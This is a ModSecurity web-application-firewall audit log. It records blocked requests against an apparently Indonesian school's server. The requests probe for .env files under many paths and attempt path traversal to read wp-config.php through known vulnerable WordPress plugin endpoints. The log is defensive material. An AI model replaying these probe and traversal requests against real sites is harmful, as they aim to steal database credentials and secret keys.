-) Stopwatch2: 1747384850396093 684; combined=275, p1=244, p2=0, p3=0, p4=0, p5=31, sr=88, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86ffae02-Z-- --a1ac3b17-A-- [16/May/2025:15:40:50 +0700] aCb6Ete6THFz1hsaJaKRhwAAAAk 103.236.140.4 47586 103.236.140.4 8181 --a1ac3b17-B-- GET /api_v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a1ac3b17-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1ac3b17-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850590223 683 (- - -) Stopwatch2: 1747384850590223 683; combined=251, p1=220, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1ac3b17-Z-- --6294e159-A-- [16/May/2025:15:40:50 +0700] aCb6Ete6THFz1hsaJaKRiAAAABA 103.236.140.4 47588 103.236.140.4 8181 --6294e159-B-- GET /api_v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --6294e159-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6294e159-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384850784224 685 (- - -) Stopwatch2: 1747384850784224 685; combined=250, p1=218, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6294e159-Z-- --c1dd9412-A-- [16/May/2025:15:40:51 +0700] aCb6E0E0LfP59mkCzg73awAAAMk 103.236.140.4 47592 103.236.140.4 8181 --c1dd9412-B-- GET /v2/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --c1dd9412-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c1dd9412-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384851173911 716 (- - -) Stopwatch2: 1747384851173911 716; combined=298, p1=266, p2=0, p3=0, p4=0, p5=32, sr=108, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c1dd9412-Z-- --539d8f56-A-- [16/May/2025:15:40:51 +0700] aCb6E9hEtho3ciA0weghcAAAAI4 103.236.140.4 47596 103.236.140.4 8181 --539d8f56-B-- GET /v1/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --539d8f56-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --539d8f56-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384851564184 692 (- - -) Stopwatch2: 1747384851564184 692; combined=272, p1=241, p2=0, p3=0, p4=0, p5=31, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --539d8f56-Z-- --4cd5b410-A-- [16/May/2025:15:40:51 +0700] aCb6E9e6THFz1hsaJaKRiQAAABI 103.236.140.4 47598 103.236.140.4 8181 --4cd5b410-B-- GET /admin/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4cd5b410-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4cd5b410-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384851758035 702 (- - -) Stopwatch2: 1747384851758035 702; combined=290, p1=258, p2=0, p3=0, p4=0, p5=32, sr=92, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4cd5b410-Z-- --83d0615f-A-- [16/May/2025:15:40:51 +0700] aCb6E0E0LfP59mkCzg73bQAAAMo 103.236.140.4 47600 103.236.140.4 8181 --83d0615f-B-- GET /laravel/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --83d0615f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --83d0615f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384851952060 672 (- - -) Stopwatch2: 1747384851952060 672; combined=272, p1=239, p2=0, p3=0, p4=0, p5=32, sr=83, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --83d0615f-Z-- --f3a2dc15-A-- [16/May/2025:15:40:52 +0700] aCb6FEE0LfP59mkCzg73bgAAAMg 103.236.140.4 47602 103.236.140.4 8181 --f3a2dc15-B-- GET /ci4/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --f3a2dc15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f3a2dc15-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852145550 658 (- - -) Stopwatch2: 1747384852145550 658; combined=250, p1=219, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f3a2dc15-Z-- --a1f0e436-A-- [16/May/2025:15:40:52 +0700] aCb6FEE0LfP59mkCzg73bwAAAMs 103.236.140.4 47604 103.236.140.4 8181 --a1f0e436-B-- GET /backup/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --a1f0e436-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a1f0e436-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852339134 681 (- - -) Stopwatch2: 1747384852339134 681; combined=273, p1=242, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a1f0e436-Z-- --16344e2a-A-- [16/May/2025:15:40:52 +0700] aCb6FNhEtho3ciA0weghcQAAAIc 103.236.140.4 47606 103.236.140.4 8181 --16344e2a-B-- GET /frontend/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --16344e2a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --16344e2a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852532444 673 (- - -) Stopwatch2: 1747384852532444 673; combined=254, p1=221, p2=0, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --16344e2a-Z-- --38ae0b36-A-- [16/May/2025:15:40:52 +0700] aCb6FNhEtho3ciA0weghcgAAAIo 103.236.140.4 47608 103.236.140.4 8181 --38ae0b36-B-- GET /old/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --38ae0b36-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --38ae0b36-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852725528 657 (- - -) Stopwatch2: 1747384852725528 657; combined=252, p1=219, p2=0, p3=0, p4=0, p5=32, sr=67, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --38ae0b36-Z-- --4305744d-A-- [16/May/2025:15:40:52 +0700] aCb6FNe6THFz1hsaJaKRigAAAA0 103.236.140.4 47610 103.236.140.4 8181 --4305744d-B-- GET /dev/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --4305744d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4305744d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384852919700 668 (- - -) Stopwatch2: 1747384852919700 668; combined=249, p1=218, p2=0, p3=0, p4=0, p5=31, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4305744d-Z-- --58232132-A-- [16/May/2025:15:40:53 +0700] aCb6FdhEtho3ciA0weghcwAAAJA 103.236.140.4 47612 103.236.140.4 8181 --58232132-B-- GET /.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --58232132-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58232132-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384853113302 681 (- - -) Stopwatch2: 1747384853113302 681; combined=252, p1=221, p2=0, p3=0, p4=0, p5=31, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58232132-Z-- --1c854e54-A-- [16/May/2025:15:40:53 +0700] aCb6FUE0LfP59mkCzg73cAAAAMw 103.236.140.4 47614 103.236.140.4 8181 --1c854e54-B-- GET /public/.env HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --1c854e54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1c854e54-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384853306699 732 (- - -) Stopwatch2: 1747384853306699 732; combined=316, p1=282, p2=0, p3=0, p4=0, p5=33, sr=122, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1c854e54-Z-- --2c74a30b-A-- [16/May/2025:15:40:58 +0700] aCb6GthEtho3ciA0weghigAAAJY 103.236.140.4 47674 103.236.140.4 8181 --2c74a30b-B-- GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --2c74a30b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c74a30b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384858799602 694 (- - -) Stopwatch2: 1747384858799602 694; combined=256, p1=224, p2=0, p3=0, p4=0, p5=32, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c74a30b-Z-- --df650c10-A-- [16/May/2025:15:40:58 +0700] aCb6GthEtho3ciA0weghiwAAAJc 103.236.140.4 47676 103.236.140.4 8181 --df650c10-B-- GET /wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --df650c10-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --df650c10-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384858993811 690 (- - -) Stopwatch2: 1747384858993811 690; combined=249, p1=224, p2=0, p3=0, p4=0, p5=25, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --df650c10-Z-- --3f7df10a-A-- [16/May/2025:15:40:59 +0700] aCb6G9hEtho3ciA0weghjAAAAJg 103.236.140.4 47678 103.236.140.4 8181 --3f7df10a-B-- GET /force-download.php?file=wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --3f7df10a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3f7df10a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384859187635 759 (- - -) Stopwatch2: 1747384859187635 759; combined=294, p1=257, p2=0, p3=0, p4=0, p5=37, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3f7df10a-Z-- --81e53329-A-- [16/May/2025:15:40:59 +0700] aCb6G9hEtho3ciA0weghjQAAAIA 103.236.140.4 47680 103.236.140.4 8181 --81e53329-B-- GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php HTTP/1.0 Host: up.smkn22jakarta.sch.id X-Real-IP: 146.190.167.107 X-Forwarded-Host: up.smkn22jakarta.sch.id X-Forwarded-Server: up.smkn22jakarta.sch.id X-Forwarded-For: 146.190.167.107 X-Forwarded-Proto: https Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.78 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Language: en-US,en;q=0.9 --81e53329-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --81e53329-H-- Message: Access denied with code 403 (phase 1). Matched phrase "wp-config.php" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747384859381465 683 (- - -) Stopwatch2: 1747384859381465 683; combined=262, p1=230, p2=0, p3=0, p4=0, p5=32, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
